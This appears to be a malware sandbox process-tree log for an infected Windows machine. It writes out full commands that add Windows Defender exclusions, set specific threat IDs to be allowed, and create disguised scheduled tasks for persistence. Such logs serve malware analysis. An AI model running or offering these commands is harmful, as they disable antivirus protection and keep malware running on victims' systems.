- - C:\Users\Admin\AppData\Local\Temp\1001.exe
    "C:\Users\Admin\AppData\Local\Temp\1001.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\1001.exe
      "C:\Users\Admin\AppData\Local\Temp\1001.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:5296
    - - C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build3.exe
        
        "C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build3.exe"
        5⤵
        
        PID:2812
      - C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build3.exe
        
        "C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build3.exe"
        6⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        
        PID:1452
    - - C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build2.exe
        
        "C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build2.exe"
        5⤵
        
        PID:5544
      - C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build2.exe
        
        "C:\Users\Admin\AppData\Local\c17a241c-57dc-4ee4-951e-3ee08a954a94\build2.exe"
        6⤵
        
        PID:928
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 928 -s 2028
        7⤵
        
        PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2472 -ip 2472
1⤵
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5888 -ip 5888
1⤵
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1984 -ip 1984
1⤵
PID:6416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2472 -ip 2472
1⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\feivvLQREPpkgTfwK\yGRxWeIFceDDoQa\dwMNXcJ.exe
C:\Users\Admin\AppData\Local\Temp\feivvLQREPpkgTfwK\yGRxWeIFceDDoQa\dwMNXcJ.exe Qh /bdsite_idFrX 385118 /S
1⤵
PID:3584
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6296
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SbqWEBPcZTbjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SbqWEBPcZTbjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WgxnLLrDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WgxnLLrDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YioZczpIItkKBvDbHdR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YioZczpIItkKBvDbHdR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nBWBSanvcuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nBWBSanvcuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nnuOpyhEGrnU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nnuOpyhEGrnU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XsGQPYCROSudQjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XsGQPYCROSudQjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\feivvLQREPpkgTfwK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\feivvLQREPpkgTfwK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\eSaHTNjzCDdUdrlu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\eSaHTNjzCDdUdrlu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:6512
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SbqWEBPcZTbjC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6596
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SbqWEBPcZTbjC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SbqWEBPcZTbjC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WgxnLLrDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WgxnLLrDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YioZczpIItkKBvDbHdR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YioZczpIItkKBvDbHdR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nBWBSanvcuUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nBWBSanvcuUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nnuOpyhEGrnU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3248
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nnuOpyhEGrnU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2472 -ip 2472
1⤵
PID:1240

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:2704
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:2500
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5888 -ip 5888
1⤵
PID:7060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1984 -ip 1984
1⤵
PID:916

C:\Users\Admin\AppData\Local\Temp\13B7.exe
C:\Users\Admin\AppData\Local\Temp\13B7.exe
1⤵
PID:6464
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 980 -ip 980
1⤵
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1984 -ip 1984
1⤵
PID:1152

C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe
"C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe"
1⤵
PID:6104

C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe
"C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe"
1⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:5932
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:2504
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5888 -ip 5888
1⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\6226.exe
C:\Users\Admin\AppData\Local\Temp\6226.exe
1⤵
PID:7132
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2916 -ip 2916
1⤵
PID:6432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2472 -ip 2472
1⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3504 -ip 3504
1⤵
PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1984 -ip 1984
1⤵
PID:5448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5888 -ip 5888
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2472 -ip 2472
1⤵
PID:5236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2472 -ip 2472
1⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:5228
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:6320
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:5760

C:\Recovery\WindowsRE\fontdrvhost.exe
C:\Recovery\WindowsRE\fontdrvhost.exe
1⤵
PID:724

C:\Windows\PolicyDefinitions\de-DE\.exe
"C:\Windows\PolicyDefinitions\de-DE\.exe"
1⤵
PID:1716

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:5480

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:6984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2472 -ip 2472
1⤵
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3208 -ip 3208
1⤵
PID:4304

C:\Program Files (x86)\Windows Mail\Idle.exe
"C:\Program Files (x86)\Windows Mail\Idle.exe"
1⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:5744
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:1800
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:5648

C:\Recovery\WindowsRE\dllhost.exe
C:\Recovery\WindowsRE\dllhost.exe
1⤵
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5348 -ip 5348
1⤵
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5348 -ip 5348
1⤵
PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3208 -ip 3208
1⤵
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2748 -ip 2748
1⤵
PID:2424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5348 -ip 5348
1⤵
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1984 -ip 1984
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2748 -ip 2748
1⤵
PID:6400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3208 -ip 3208
1⤵
PID:6768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5348 -ip 5348
1⤵
PID:2704

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\SystemID\wscript.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2472 -ip 2472
1⤵
PID:6384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2748 -ip 2748
1⤵
PID:7040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\SystemID\wscript.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\SystemID\wscript.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5456

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:5388

C:\ProgramData\AdobeReader\GeforceUpdater.exe
C:\ProgramData\AdobeReader\GeforceUpdater.exe
1⤵
PID:1320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5348 -ip 5348
1⤵
PID:6284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3208 -ip 3208
1⤵
PID:5504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\Quirky\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2472 -ip 2472
1⤵
PID:1048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5348 -ip 5348
1⤵
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3208 -ip 3208
1⤵
PID:6296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Media\Quirky\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5048 -ip 5048
1⤵
PID:2512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Windows\Media\Quirky\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2748 -ip 2748
1⤵
PID:5312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Users\Default\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2472 -ip 2472
1⤵
PID:1012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 548 -ip 548
1⤵
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5348 -ip 5348
1⤵
PID:7264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3208 -ip 3208
1⤵
PID:7256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Users\Default\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5348 -ip 5348
1⤵
PID:7692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2748 -ip 2748
1⤵
PID:7808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3208 -ip 3208
1⤵
PID:7988

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\9106f9d6dced420782d1f53503dc3a8a /t 5580 /p 3780
1⤵
PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallUtilI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\InstallUtil.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3208 -ip 3208
1⤵
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2748 -ip 2748
1⤵
PID:6004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallUtilI" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\InstallUtil.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallUtil" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\InstallUtil.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6904

